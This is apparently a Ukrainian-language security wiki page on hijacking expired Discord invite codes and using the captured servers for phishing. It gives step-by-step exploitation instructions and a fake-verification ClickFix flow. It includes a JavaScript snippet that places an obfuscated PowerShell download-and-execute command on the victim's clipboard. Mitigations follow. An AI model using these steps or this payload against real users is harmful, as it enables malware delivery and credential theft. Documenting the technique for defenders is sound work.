Discord Invite Hijacking

Вразливість системи запрошень Discord дозволяє зловмисникам отримувати доступ до застарілих або видалених кодів запрошень (тимчасових, постійних або кастомних) як нових посилань на будь-якому сервері з підвищенням рівня 3. Нормалізуючи всі коди до нижнього регістру, зловмисники можуть попередньо зареєструвати відомі коди запрошень і тихо перехоплювати трафік, як тільки оригінальне посилання закінчує термін дії або сервер-джерело втрачає своє підвищення.

Типи запрошень та ризик перехоплення

Кроки експлуатації

1. Розвідка

• Моніторинг публічних джерел (форумів, соціальних мереж, каналів Telegram) на наявність посилань на запрошення, що відповідають шаблону discord.gg/{code} або discord.com/invite/{code}.
• Збір кодів запрошень, що вас цікавлять (тимчасових або кастомних).

2. Попередня реєстрація

• Створіть або використовуйте існуючий сервер Discord з привілеями підвищення рівня 3.
• У Налаштуваннях сервера → Кастомне URL, спробуйте призначити цільовий код запрошення. Якщо прийнято, код резервується зловмисним сервером.

3. Активація перехоплення

• Для тимчасових запрошень чекайте, поки оригінальне запрошення не закінчить термін дії (або видаліть його вручну, якщо ви контролюєте джерело).
• Для кодів, що містять великі літери, варіант з малими літерами можна отримати негайно, хоча перенаправлення активується лише після закінчення терміну дії.

4. Тихе перенаправлення

• Користувачі, які відвідують старе посилання, безперешкодно перенаправляються на сервер, контрольований зловмисником, як тільки перехоплення активується.

Потік фішингу через сервер Discord

1. Обмежте канали сервера так, щоб лише канал #verify був видимим.
2. Розгорніть бота (наприклад, Safeguard#0786), щоб запропонувати новачкам підтвердити свою особу через OAuth2.
3. Бот перенаправляє користувачів на фішинговий сайт (наприклад, captchaguard.me) під виглядом CAPTCHA або етапу перевірки.
4. Реалізуйте трюк UX ClickFix:

• Відобразіть повідомлення про зламану CAPTCHA.
• Скажіть користувачам відкрити діалог Win+R, вставити попередньо завантажену команду PowerShell і натиснути Enter.

Приклад ін'єкції в буфер обміну ClickFix

// Copy malicious PowerShell command to clipboard
const cmd = `powershell -NoExit -Command "$r='NJjeywEMXp3L3Fmcv02bj5ibpJWZ0NXYw9yL6MHc0RHa';` +
`$u=($r[-1..-($r.Length)]-join '');` +
`$url=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($u));` +
`iex (iwr -Uri $url)"`;
navigator.clipboard.writeText(cmd);

Цей підхід уникає прямих завантажень файлів і використовує знайомі елементи інтерфейсу, щоб знизити підозру користувачів.

Заходи пом'якшення

• Використовуйте постійні посилання на запрошення, що містять принаймні одну велику літеру або неалфавітний символ (ніколи не закінчуються, не підлягають повторному використанню).
• Регулярно змінюйте коди запрошень і відкликайте старі посилання.
• Моніторте статус підвищення сервера Discord і заяви про унікальні URL.
• Навчайте користувачів перевіряти автентичність сервера та уникати виконання команд, вставлених з буфера обміну.

Посилання

• From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery – https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/
• Discord Custom Invite Link Documentation – https://support.discord.com/hc/en-us/articles/115001542132-Custom-Invite-Link